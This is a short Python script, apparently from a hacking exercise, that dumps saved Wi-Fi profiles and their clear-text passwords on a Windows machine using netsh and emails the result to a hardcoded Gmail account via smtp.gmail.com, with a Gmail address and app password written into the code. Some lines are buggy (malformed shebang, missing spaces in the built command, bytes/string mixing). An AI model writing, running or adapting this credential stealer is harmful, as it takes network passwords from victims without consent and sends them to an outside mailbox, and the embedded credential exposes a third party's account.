#!usr/bin/env python3
import smtplib
import subprocess
import re



def send_mail(email,password,msg):
    # using google public mail server
    server=smtplib.SMTP("smtp.gmail.com",587)
    server.starttls()
    server.login(email,password)
    server.sendmail(email,email,msg)
    server.quit()

command = "netsh wlan show profile"
networks=subprocess.check_output(command,shell=True)
network_names_list=re.findall(r"(?:Profile\s*:\s)(.*)",networks)
# result = subprocess.check_output(command, shell=True)

result=""

for network_name in network_names_list:
    command= "netsh wlan show profile" + network_name + "key=clear"
    current_result=subprocess.check_output(command,shell=True)
    result+=current_result

# password is generated by adding new app password in your gmail acc
send_mail("adytzuady982@gmail.com", "ljke ftdh igcw xckr",result )